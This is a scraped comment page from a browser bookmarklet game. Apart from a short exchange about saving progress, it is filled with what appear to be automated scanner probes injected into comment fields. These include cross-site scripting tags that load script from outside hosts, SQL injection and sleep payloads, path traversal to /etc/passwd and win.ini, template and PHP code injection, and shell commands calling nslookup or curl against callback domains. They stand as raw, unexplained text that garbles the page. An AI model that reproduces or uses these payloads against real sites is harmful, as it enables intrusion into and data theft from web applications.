You could have an option to save what has been shot at so that for example ads will be gone forever!! I assume this wouldn't be possible with the JavaScript bookmark thing but maybe with the Chrome extension.
579 agree
Unvote8064 agree
2858 agree
798 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
660 agree
645 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
579 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
489 agree
488 agree
482 agree
479 agree
476 agree
469 agree
467 agree
465 agree
462 agree
461 agree
455 agree
455 agree
441 agree
434 agree
432 agree
420 agree
GM213
That wood be awsomeBoogerflicker
Yeah your first assumption is right. I can't think of a way to save your progress because the bookmark is just making a copy of the website in the webpage, almost like a picture. That is why when you refresh the page you get the original page and no damage has been done to it. Although in a way you can "save" your game. If you are destroying a site you can click cancel and it will record the amount of points you have and add them to your xp and to your highscores list, they just won't be published to the global highscores because it only registers if you completely destroy the webpage.lxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1DLcR3Yz96OWfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>1CG8X9IKnlO
1WfxYANoW
${9999179+9999053}WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg${10000201+9999221}
1Anonymous
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
response.write(9335200*9747078)WfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
'+response.write(9335200*9747078)+'WfxYANoW
file:///etc/passwdWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
1WfxYANoW
"+response.write(9335200*9747078)+"WfxYANoW
../1WfxYANoW
echo gqjunw$()\ bwyjus\nz^xyu||a #' &echo gqjunw$()\ bwyjus\nz^xyu||a #|" &echo gqjunw$()\ bwyjus\nz^xyu||a #WfxYANoW
6BShNXIsWfxYANoW
&echo zghrdt$()\ lanifp\nz^xyu||a #' &echo zghrdt$()\ lanifp\nz^xyu||a #|" &echo zghrdt$()\ lanifp\nz^xyu||a #response.write(9666501*9040666)
1WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
/etc/shellsWfxYANoW
1&echo vlyhyx$()\ clvfja\nz^xyu||a #' &echo vlyhyx$()\ clvfja\nz^xyu||a #|" &echo vlyhyx$()\ clvfja\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shellsfile:///etc/passwd
1WfxYANoW
dlT78Vf1: LMTG8hZI'+response.write(9666501*9040666)+'
1WfxYANoW
1WfxYANoW
|echo dclxid$()\ pkkgnl\nz^xyu||a #' |echo dclxid$()\ pkkgnl\nz^xyu||a #|" |echo dclxid$()\ pkkgnl\nz^xyu||a #../WfxYANoW
1WfxYANoW
1&n960788=v958108WfxYANoW
c:/windows/win.iniWfxYANoW
1|echo plxyhq$()\ sxiofb\nz^xyu||a #' |echo plxyhq$()\ sxiofb\nz^xyu||a #|" |echo plxyhq$()\ sxiofb\nz^xyu||a #"+response.write(9666501*9040666)+"
1owa0RhKz
1WfxYANoW
(nslookup -q=cname hitlcpyhbcqxd14a9e.bxss.me||curl hitlcpyhbcqxd14a9e.bxss.me))bENOZ1J6cEQ=
1ksu7DqXx: fMYcckvt
1WfxYANoW
bxss.meWfxYANoW&n994212=v906710
1WfxYANoW
$(nslookup -q=cname hitvcgakxijvw11511.bxss.me||curl hitvcgakxijvw11511.bxss.me)WfxYANoW
&nslookup -q=cname hitsbhmhfsbjw0f064.bxss.me&'\"`0&nslookup -q=cname hitsbhmhfsbjw0f064.bxss.me&`'WfxYANoW
)WfxYANoW
&(nslookup -q=cname hitkznacgeeir5140a.bxss.me||curl hitkznacgeeir5140a.bxss.me)&'\"`0&(nslookup -q=cname hitkznacgeeir5140a.bxss.me||curl hitkznacgeeir5140a.bxss.me)&`'WfxYANoW
!(()&&!|*|*|WfxYANoW
'.gethostbyname(lc('hitkp'.'wrjuxxveac5ef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(76).chr(109).chr(81).'WfxYANoW
^(#$!@#$)(()))******WfxYANoW
|(nslookup -q=cname hitrbsaghqwlx172b5.bxss.me||curl hitrbsaghqwlx172b5.bxss.me)WfxYANoW
".gethostbyname(lc("hitkl"."hqysoofkab697.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(76).chr(113).chr(82).")
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
`(nslookup -q=cname hitkwrzzjuwhe14c89.bxss.me||curl hitkwrzzjuwhe14c89.bxss.me)`Http://bxss.me/t/fit.txt
1WfxYANoW
1!(()&&!|*|*|
1http://bxss.me/t/fit.txt?.jpg
1/etc/shells
1WfxYANoW
;(nslookup -q=cname hitublpqcibaj78280.bxss.me||curl hitublpqcibaj78280.bxss.me)|(nslookup -q=cname hitublpqcibaj78280.bxss.me||curl hitublpqcibaj78280.bxss.me)&(nslookup -q=cname hitublpqcibaj78280.bxss.me||curl hitublpqcibaj78280.bxss.me)WfxYANoW
gethostbyname(lc('hitbj'.'jedylmhd0aa13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(87).chr(104).chr(85)WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hithalocwumsz76a11.bxss.me||curl${IFS}hithalocwumsz76a11.bxss.me)c:/windows/win.ini
1bxss.me
1^(#$!@#$)(()))******
1WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitwjtqkeitjk443b1.bxss.me||curl${IFS}hitwjtqkeitjk443b1.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwjtqkeitjk443b1.bxss.me||curl${IFS}hitwjtqkeitjk443b1.bxss.me)&`'WfxYANoW
'"()WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
1WfxYANoW
';print(md5(31337));$a='WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
";print(md5(31337));$a="WfxYANoW
1'&&sleep(27*1000)*vtrfhq&&'WfxYANoW
xfs.bxss.meWfxYANoW
1"&&sleep(27*1000)*tzmayj&&"xfs.bxss.me
1WfxYANoW
1'||sleep(27*1000)*zauuvu||'WfxYANoW
1'"()&%<zzz><ScRiPt >6hAa(9113)</ScRiPt>WfxYANoW
1"||sleep(27*1000)*xbdnzp||"WfxYANoW
${@print(md5(31337))}WfxYANoW
'"WfxYANoW
1WfxYANoW
${@print(md5(31337))}\WfxYANoW
<!--'"
1'"()
1WfxYANoW
'.print(md5(31337)).'WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW'&&sleep(27*1000)*pmjfgf&&'
1WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
'"()&%<zzz><ScRiPt >6hAa(9520)</ScRiPt>';print(md5(31337));$a='
1HttP://bxss.me/t/xss.html?%00
1WfxYANoW
19029183WfxYANoW"&&sleep(27*1000)*wbymgi&&"
1<!--
1bxss.me/t/xss.html?%00
1";print(md5(31337));$a="
1WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(109).concat(74).concat(117).concat(73)+(require"socket" Socket.gethostbyname("hitdj"+"qbtmjgvl43328.bxss.me.")[3].to_s)+"WfxYANoW'||sleep(27*1000)*nzynad||'
1WfxYANoW
commentWfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(116).concat(77).concat(99).concat(89)+(require'socket' Socket.gethostbyname('hitos'+'pnkxcede0f694.bxss.me.')[3].to_s)+'WfxYANoW"||sleep(27*1000)*iwtrti||"
1WfxYANoW
comment�${@print(md5(31337))}
1WfxYANoW
bfg5110<s1﹥s2ʺs3ʹhjl5110WfxYANoW
comment/.comment
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(103).concat(76).concat(116).concat(82)+(require'socket' Socket.gethostbyname('hitsy'+'ouqdomeb74005.bxss.me.')[3].to_s)comment�
1${@print(md5(31337))}\
1'.print(md5(31337)).'
1comment/.
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
1WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >6hAa(9830)</ScRiPt>WfxYANoW
1<WRAMEN>IILIR[!+!]</WRAMEN>WfxYANoW
1<script>6hAa(9945)</script>WfxYANoW
1<script>6hAa(9580)</script>9580WfxYANoW
1<ScR<ScRiPt>IpT>6hAa(9567)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >6hAa(9443)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9496></ScRiPt>WfxYANoW
1<�ScRiPt >6hAa(9988)</ScRiPt>WfxYANoW
1zkRhlu6sWfxYANoW
1<isindex type=image src=1 onerror=6hAa(9618)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9237'>WfxYANoW
1<body onload=6hAa(9977)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=6hAa(9424)>WfxYANoW
1<img src=xyz OnErRor=6hAa(9325)>WfxYANoW
1<img/src=">" onerror=alert(9458)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%36%68%41%61%289656%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\6hAa(9829)\u003C/sCripT\u003EWfxYANoW
1WfxYANoW
1<ScRiPt>6hAa(9201)</sCripT>WfxYANoW
-1 OR 2+459-459-1=0+0+0+1 --WfxYANoW
1<input autofocus onfocus=6hAa(9503)>WfxYANoW
-1 OR 2+659-659-1=0+0+0+1WfxYANoW
-1' OR 2+763-763-1=0+0+0+1 --WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
-1' OR 2+820-820-1=0+0+0+1 or '5BJ8X1nx'='WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
-1" OR 2+882-882-1=0+0+0+1 --WfxYANoW
1}body{zzz:Expre/**/SSion(6hAa(9136))}WfxYANoW
1bViXI <ScRiPt >6hAa(9117)</ScRiPt>WfxYANoW
1<W1VZGW>SG46W[!+!]</W1VZGW>WfxYANoW
1<ifRAme sRc=9816.com></IfRamE>WfxYANoW
1<aEidqGo x=9432>WfxYANoW
1<img sRc='http://attacker-9637/log.php?WfxYANoW
1<aPPfjdZ<WfxYANoW'"()&%<zzz><ScRiPt >6hAa(9352)</ScRiPt>
1'"()&%<zzz><ScRiPt >6hAa(9967)</ScRiPt>
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW9480867
1bfg10220<s1﹥s2ʺs3ʹhjl10220
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >6hAa(9851)</ScRiPt>
1WfxYANoW<WIDVZ1>NX8T3[!+!]</WIDVZ1>
1WfxYANoW<script>6hAa(9649)</script>
1WfxYANoW<script>6hAa(9511)</script>9511
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<ScRiPt >6hAa(9749)</ScRiPt>
1WfxYANoW<�ScRiPt >6hAa(9582)</ScRiPt>
1WfxYANoW<body onload=6hAa(9835)>
1WfxYANoW<img src=xyz OnErRor=6hAa(9573)>
1WfxYANoW<img/src=">" onerror=alert(9143)>
1WfxYANoW\u003CScRiPt\6hAa(9120)\u003C/sCripT\u003E
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<ScRiPt>6hAa(9264)</sCripT>
1WfxYANoW<input autofocus onfocus=6hAa(9456)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(6hAa(9589))}
1WfxYANoW0Ckpf <ScRiPt >6hAa(9560)</ScRiPt>
1WfxYANoW<WEZSLK>HFAZH[!+!]</WEZSLK>
1WfxYANoW<ifRAme sRc=9634.com></IfRamE>
1WfxYANoW<aIYVJjZ x=9192>
1WfxYANoW<img sRc='http://attacker-9337/log.php?
1WfxYANoW<aN68FUS<
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1o3GyjtuT'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 115=(SELECT 115 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 346=(SELECT 346 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 581=(SELECT 581 FROM PG_SLEEP(15))--WfxYANoW
17SutVwCy' OR 874=(SELECT 874 FROM PG_SLEEP(15))--WfxYANoW
1Fm2lslg2') OR 68=(SELECT 68 FROM PG_SLEEP(15))--WfxYANoW
1efcUHBqi')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@P0EdiWfxYANoW
1WfxYANoW
1WfxYANoWudfKb86q
1WfxYANoW
1-1 OR 2+61-61-1=0+0+0+1 --
1-1 OR 2+251-251-1=0+0+0+1
1-1' OR 2+913-913-1=0+0+0+1 --
1-1' OR 2+544-544-1=0+0+0+1 or 'BKILC8FL'='
1-1" OR 2+452-452-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWncHrCeTh'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@da3ve
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comlbvvcjyd
1mslvlxii
response.write(9887220*9822938)mslvlxii
'+response.write(9887220*9822938)+'sfnqjcdc
1mslvlxii
"+response.write(9887220*9822938)+"sfnqjcdc
1pwgohhlh
set|set&setresponse.write(9543336*9933588)
1sfnqjcdc
oqfhAzhrpwgohhlh
$(nslookup b9WgIdmX)'+response.write(9543336*9933588)+'
1sfnqjcdc
-1 OR 2+567-567-1=0+0+0+1 --ryengocd
ZPClLrMFihjgxpsj
../../../../../../../../../../etc/passwdpwgohhlh
&nslookup QcTOpuzu&'\"`0&nslookup QcTOpuzu&`'"+response.write(9543336*9933588)+"
1sfnqjcdc
-1 OR 2+165-165-1=0+0+0+1dh4lf5Ph
1ihjgxpsj
../../../../../../../../../../../../../../../proc/versionset|set&set
1gbjikxrs
1sfnqjcdc
-1' OR 2+463-463-1=0+0+0+1 --nyugeraf
${9999565+9999381}ihjgxpsj
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg$(nslookup G9U3v73U)
1sfnqjcdc
-1' OR 2+212-212-1=0+0+0+1 or '23kuLmKZ'='${9999027+10000337}
1cpuvlhhs
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgihjgxpsj
../../../../../../../../../../etc/passwd�.jpg&nslookup qCVFCQhw&'\"`0&nslookup qCVFCQhw&`'
1sfnqjcdc
-1" OR 2+46-46-1=0+0+0+1 --YUhqOWQ0YUQ=
1cpuvlhhs
1some_inexistent_file_with_long_name�.jpgihjgxpsj
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgisheyaps
1&n907600=v985046sfnqjcdc
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/ljjcyrrv
)cpuvlhhs
Http://testasp.vulnweb.com/t/fit.txtihjgxpsj
/../..//../..//../..//../..//../..//etc/passwd�.jpggbjikxrs
1sfnqjcdc
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/ljjcyrrv
!(()&&!|*|*|cpuvlhhs
http://testasp.vulnweb.com/t/fit.txt?.jpgihjgxpsj
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdvuncxqug&n906088=v944740
1Anonymous
1sfnqjcdc
-1; waitfor delay '0:0:10' --ljjcyrrv
^(#$!@#$)(()))******cpuvlhhs
testasp.vulnweb.comihjgxpsj
/etc/passwdsfnqjcdc
-1); waitfor delay '0:0:3' --)
1ihjgxpsj
%2fetc%2fpasswdsfnqjcdc
-1); waitfor delay '0:0:0' --!(()&&!|*|*|
11some_inexistent_file_with_long_name�.jpg
1ihjgxpsj
/.././.././.././.././.././.././.././../etc/./passwd%00aaxjbkgr
'"()bdenlhcr
;print(md5(acunetix_wvs_security_test));sfnqjcdc
1 waitfor delay '0:0:3' --^(#$!@#$)(()))******
1Http://testasp.vulnweb.com/t/fit.txt
1ihjgxpsj
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdbdenlhcr
';print(md5(acunetix_wvs_security_test));$a='sfnqjcdc
1 waitfor delay '0:0:7' --qoglskeh
http://testasp.vulnweb.com/t/xss.html?%00.jpggjujdaar
1http://testasp.vulnweb.com/t/fit.txt?.jpg
1ihjgxpsj
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd'"()
1bdenlhcr
";print(md5(acunetix_wvs_security_test));$a="sfnqjcdc
PfXMXcMi'; waitfor delay '0:0:3' --http://testasp.vulnweb.com/t/xss.html?%00.jpg
1gjujdaar
commenttestasp.vulnweb.com
1qtbpshro
http://hitAh2hMBro4c.bxss.me/bdenlhcr
${@print(md5(acunetix_wvs_security_test))}sfnqjcdc
VgGfpayz'; waitfor delay '0:0:10' --sckkjbny
1gjujdaar
comment�bnqfjkoh
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))ihjgxpsj
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.http://hithhAmcdnJoS.bxss.me/
1bdenlhcr
${@print(md5(acunetix_wvs_security_test))}\sfnqjcdc
-1;select pg_sleep(7); --sckkjbny
1'"gjujdaar
comment/.ihjgxpsj
file:///etc/passwdrgatdick
/www.vulnweb.com;print(md5(acunetix_wvs_security_test));
1sfnqjcdc
-1);select pg_sleep(7); --sckkjbny
\gjujdaar
1xdahqpmy
'"ihjgxpsj
/\../\../\../\../\../\../\../etc/passwd/www.vulnweb.com
1';print(md5(acunetix_wvs_security_test));$a='
1sfnqjcdc
-1));select pg_sleep(7); --comment
1xdahqpmy
<!--ihjgxpsj
WEB-INF/web.xmlirackvpe
1'"()&%<acx><ScRiPt >IiS0(9171)</ScRiPt>";print(md5(acunetix_wvs_security_test));$a="
1sfnqjcdc
9XFWVheS';select pg_sleep(7); --sckkjbny
@@F3uoqcomment�
1'"
1ihjgxpsj
/WEB-INF/web.xml${@print(md5(acunetix_wvs_security_test))}
1sfnqjcdc
UCfsNOoA');select pg_sleep(10); --sckkjbny
JyI=comment/.
1<!--
1ihjgxpsj
WEB-INF\web.xmlirackvpe
'"()&%<acx><ScRiPt >IiS0(9526)</ScRiPt>${@print(md5(acunetix_wvs_security_test))}\
1sfnqjcdc
MH65010Y'));select pg_sleep(10); --../../../../../../../../../../etc/passwd
1sfnqjcdc
1irackvpe
1_9557sfnqjcdc
1sckkjbny
(select convert(int,CHAR(65)))PpOhgbGf
1sckkjbny
1irackvpe
acu4814<s1﹥s2ʺs3ʹuca4814../../../../../../../../../../etc/passwd�.jpg
1-1 OR 2+771-771-1=0+0+0+1 --
11'"
1-1 OR 2+275-275-1=0+0+0+1
1\
1-1' OR 2+202-202-1=0+0+0+1 --
1-1' OR 2+779-779-1=0+0+0+1 or 'Ob1uySab'='
1@@z9vMO
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1irackvpe
{{9999766*9999871}}-1" OR 2+662-662-1=0+0+0+1 --
1JyI=
1/etc/passwd
1%2fetc%2fpasswd
1irackvpe
1<ScRiPt >IiS0(9812)</ScRiPt>1 waitfor delay '0:0:9' --
1(select convert(int,CHAR(65)))
1irackvpe
1<WXTVCN>K3GNU[!+!]</WXTVCN>9VQFQSk3'; waitfor delay '0:0:9' --
1eMmfLyZY';select pg_sleep(9); --
1irackvpe
1<script>IiS0(9964)</script>xL0jv5Ep');select pg_sleep(13); --
1LEyqt1Xp'));select pg_sleep(13); --
1file:///etc/passwd
1irackvpe
1<ScR<ScRiPt>IpT>IiS0(9275)</sCr<ScRiPt>IpT>/\../\../\../\../\../\../\../etc/passwd
1WEB-INF/web.xml
1irackvpe
1<ScRiPt >IiS0(9279)</ScRiPt>/WEB-INF/web.xml
1WEB-INF\web.xml
1irackvpe
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9877></ScRiPt>irackvpe
1<�ScRiPt >IiS0(9733)</ScRiPt>irackvpe
1<video><source onerror="javascript:IiS0(9844)">irackvpe
1<isindex type=image src=1 onerror=IiS0(9200)>irackvpe
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9020'>irackvpe
1<body onload=IiS0(9257)>irackvpe
1<img src=//testasp.vulnweb.com/t/dot.gif onload=IiS0(9673)>irackvpe
1<img src=xyz OnErRor=IiS0(9759)>irackvpe
1<img/src=">" onerror=alert(9219)>irackvpe
%31%3C%53%63%52%69%50%74%20%3E%49%69%53%30%289042%29%3C%2F%73%43%72%69%70%54%3Eirackvpe
1\u003CScRiPt\IiS0(9098)\u003C/sCripT\u003Eirackvpe
1<ScRiPt>IiS0(9427)</sCripT>irackvpe
1<input autofocus onfocus=IiS0(9702)>irackvpe
<a HrEF=http://www.vulnweb.com></a>irackvpe
<a HrEF=jaVaScRiPT:>irackvpe
[url=http://www.vulnweb.com][/url]irackvpe
1<img<!-- --> src=x onerror=alert(9122);//><!-- -->irackvpe
1}body{acu:Expre/**/SSion(IiS0(9116))}irackvpe
1<% contenteditable onresize=IiS0(9963)>irackvpe
1_Nveji <ScRiPt >IiS0(9398)</ScRiPt>irackvpe
1<W7MLWJ>BIIO9[!+!]</W7MLWJ>irackvpe
1<ifRAme sRc=9848.com></IfRamE>irackvpe
1<4aBPck x=9654>irackvpe
1<img sRc='http://attacker-9123/log.php?irackvpe'"()&%<acx><ScRiPt >IiS0(9714)</ScRiPt>
1'"()&%<acx><ScRiPt >IiS0(9708)</ScRiPt>
1irackvpe_9875
1acu2694<s1﹥s2ʺs3ʹuca2694
1{{9999739*9999545}}
1irackvpe<ScRiPt >IiS0(9686)</ScRiPt>
1irackvpe<WAHZCF>CZSGJ[!+!]</WAHZCF>
1irackvpe<script>IiS0(9168)</script>
1irackvpe<ScRiPt >IiS0(9054)</ScRiPt>
1irackvpe<�ScRiPt >IiS0(9858)</ScRiPt>
1irackvpe<body onload=IiS0(9336)>
1irackvpe<img src=xyz OnErRor=IiS0(9928)>
1irackvpe<img/src=">" onerror=alert(9033)>
1irackvpe\u003CScRiPt\IiS0(9959)\u003C/sCripT\u003E
1irackvpe<ScRiPt>IiS0(9607)</sCripT>
1irackvpe<input autofocus onfocus=IiS0(9219)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1irackvpe}body{acu:Expre/**/SSion(IiS0(9841))}
1irackvpe<% contenteditable onresize=IiS0(9476)>
1irackvpe_iH27G <ScRiPt >IiS0(9376)</ScRiPt>
1irackvpe<WJP1DR>HAWXR[!+!]</WJP1DR>
1irackvpe<ifRAme sRc=9825.com></IfRamE>
1irackvpe<TU3MAM x=9691>
1irackvpe<img sRc='http://attacker-9643/log.php?
1Comment